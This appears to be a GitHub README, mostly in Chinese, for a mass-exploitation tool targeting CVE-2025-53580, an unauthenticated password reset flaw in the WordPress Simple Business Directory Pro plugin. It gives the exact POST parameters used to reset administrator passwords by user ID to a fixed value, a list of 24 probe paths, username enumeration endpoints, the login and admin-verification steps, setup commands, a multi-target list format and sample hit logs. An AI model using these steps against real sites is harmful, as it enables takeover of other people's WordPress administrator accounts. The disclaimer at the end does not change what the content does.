Nxploited/CVE-2025-53580

GitHub: Nxploited/CVE-2025-53580

识别并利用 WordPress Simple Business Directory Pro 的未认证密码重置漏洞，实现无需凭证的管理员接管。

Stars: 0 | Forks: 0

# CVE-2025-53580 WordPress Simple Business Directory Pro 插件 < 15.6.9 存在高优先级权限提升漏洞 # CVE-2025-53580 ### Simple Business Directory Pro — 错误的权限分配 → 密码重置 → 管理员接管 ``` ___ _ ___ __ __ __ ____ ____ ___ ____ __ __ / (_)(_| |_// (_) / )/ \/ )| | / \| / \ / \ | | | \__ /| | / |___ |___ __/|___ \__/| | | | | / -----/ | |/ \----- \ \ \/ \| | \___/ \_/ \___/ /___\__//___\___/ \___/\___/\___/\__/ \__/ ``` ![CVE](https://img.shields.io/badge/CVE-2025--53580-critical?style=flat-square&color=8B0000) ![Plugin](https://img.shields.io/badge/Simple%20Business%20Directory%20Pro%20%3C%2015.6.9-555?style=flat-square) ![Auth](https://img.shields.io/badge/Auth-None-brightgreen?style=flat-square) ![Python](https://img-shields.io/badge/Python-3.8%2B-3776AB?style=flat-square&logo=python) ![Author](https://img.shields.io/badge/By-Nxploited-00aa55?style=flat-square) ## ❶ 漏洞信息 | 字段 | 详情 | |---|---| | **CVE** | CVE-2025-53580 | | **插件** | quantumcloud Simple Business Directory Pro (`simple-business-directory-pro`) | | **影响版本** | 所有版本 **< 15.6.9** | | **认证要求** | **无需认证** | | **漏洞类型** | 错误的权限分配 → 未认证密码重置 | | **CWE** | CWE-266 · 错误的权限分配 | **根本原因：** 插件暴露了一个前端密码恢复表单 (`qcpd-restore-pwd`)，该表单接受数字型的 `qcpd-uid`（WordPress 用户 ID）和新的 `pass` 值。在修改密码前未实施任何认证、令牌、Nonce 或邮箱验证。攻击者无需身份验证即可重置 **用户 ID 1**（通常为站点管理员）及其他用户的密码，随后使用注入的密码登录并获得完整管理员权限。 ## ❷ 攻击流程 ``` ┌─────────────────────────────────────────────────────────────────┐ │ 1. Discover SBD restore page │ │ Probe 24 candidate paths → match body containing "sbd" │ │ │ │ 2. Reset passwords by user ID │ │ POST │ │ qcpd-restore-pwd = restore │ │ qcpd-restore-pwd-type = user │ │ qcpd-uid = 1 (then 2, then 3) │ │ pass = NxploitedNX │ │ │ │ 3. Enumerate usernames │ │ /?author=1..9 → redirect / body parse │ │ /wp-json/wp/v2/users → slug / username fields │ │ hostname heuristic + "admin" fallback │ │ │ │ 4. Login with injected password │ │ POST /wp-login.php log= pwd=NxploitedNX │ │ Check: wordpress_logged_in cookie present │ │ │ │ 5. Verify admin access (dual method) │ │ GET /wp-json/wp/v2/users/me → capabilities.manage_options│ │ GET /wp-admin/users.php → adminmenu / users table │ │ │ │ 6. Write confirmed hit → Nx_sbd_login_hits.txt │ └─────────────────────────────────────────────────────────────────┘ ``` ## ❸ 环境搭建 ``` git clone https://github.com/Nxploited/CVE-2025-53580.git cd CVE-2025-53580 pip install -r requirements.txt ``` **`requirements.txt`** ``` requests>=2.28.0 urllib3>=1.26.0 colorama>=0.4.6 ``` ## ❹ 使用方法 ``` python3 CVE-2025-53580.py ``` ### 提示信息 ``` Targets list file (one host/URL per line) [list.txt]: list.txt Threads (concurrent sites) [3]: 5 HTTP timeout (seconds) [10]: 10 Successful hits file [Nx_sbd_login_hits.txt]: Nx_sbd_login_hits.txt ``` ## ❺ 目标格式 — `list.txt` ``` https://target1.com target2.com http://target3.com ``` ## ❻ 探测的候选 SBD 页面该工具对每个目标扫描 **24 条路径**，寻找页面内容中包含 `sbd` 的页面： ``` /login /log-in /signin /sign-in /user-login /account/login /restore /password-reset /reset-password /lost-password /lostpassword /user/restore /my-account /members/login /member-login /customer-login /wp-login.php /blog/login /auth/login /auth/restore /sbd-login /sbd-restore /blog/log-in /account/log-in ``` ## ❼ 用户名枚举 | 方法 | 端点 | |---|---| | 作者重定向 | `/?author=1` → `/?author=9` | | REST API | `/wp-json/wp/v2/users` → `slug` + `username` | | 主机名启发式 | 域名的第一个标签 | | 硬编码回退 | 始终包含 `admin` | ## ❽ 管理员验证 — 双重方法每个成功的登录在写入磁盘前均通过两种独立检查进行验证： **方法 1 — REST API：** ``` GET /wp-json/wp/v2/users/me → capabilities.manage_options = true → ADMIN CONFIRMED ``` **方法 2 — 仪表板：** ``` GET /wp-admin/users.php → adminmenu / users table markers present → ADMIN CONFIRMED ``` ## ❾ 输出文件 **`Nx_sbd_login_hits.txt`** ``` [2025-06-01 14:22:10] https://target.com - type=ADMIN - user=admin - login=/wp-login.php user=admin pass=NxploitedNX - detail=ADMIN_CONFIRMED_REST(manage_options) [2025-06-01 14:23:05] https://target2.com - type=USER - user=editor - login=/wp-login.php user=editor pass=NxploitedNX - detail=not_admin(rest_no_manage_options, wpadmin_no_strong_markers) ``` ## ❿ 终端输出示例 ``` [info] https://target.com :: starting [ok] https://target.com :: found front-end sbd page at https://target.com/my-account [info] https://target.com :: starting qcpd-uid=1..3 brute with pass=NxploitedNX [info] https://target.com :: POST uid=1 → status=302, Location=/my-account/?restored=1 [info] https://target.com :: POST uid=2 → status=302, Location=/my-account/?restored=1 [info] https://target.com :: extracting usernames and trying login [ok] https://target.com :: login OK for user='admin', checking admin... [ok] https://target.com :: HIT for user='admin' → admin=True, detail=ADMIN_CONFIRMED_REST(manage_options) [warn] https://target2.com :: no sbd page found in candidate restore paths, skipping ``` ## ⓫ 作者 ``` Nxploited (Khaled Alenazi) GitHub → https://github.com/Nxploited Telegram → @KNxploited ``` [![GitHub](https://img.shields.io/badge/GitHub-Nxploited-181717?style=for-the-badge&logo=github)](https://github.com/Nxploited) [![Telegram](https://img.shields.io/badge/Telegram-@KNxploited-2CA5E0?style=for-the-badge&logo=telegram)](https://t.me/KNxploited) ## ⓬ 免责声明 ``` FOR AUTHORIZED SECURITY RESEARCH AND EDUCATION ONLY. The author bears no responsibility for use against systems the operator does not own or have explicit written permission to test. Unauthorized use violates the CFAA, CMA, and equivalent laws worldwide. You alone are responsible for your actions. ``` _{© 2025 Nxploited · Simple Business Directory Pro < 15.6.9 · 已修复于 15.6.9}

标签：CISA项目, CSV导出, CVE-2025-53580, CWE-266, Privilege Escalation, Simple Business Directory Pro, StruQ, Web安全, WordPress, WordPress插件, 前端漏洞, 威胁模拟, 安全漏洞, 密码注入, 密码重置, 插件安全, 无认证攻击, 未授权, 权限升级, 漏洞, 漏洞披露, 管理员接管, 蓝队分析, 逆向工具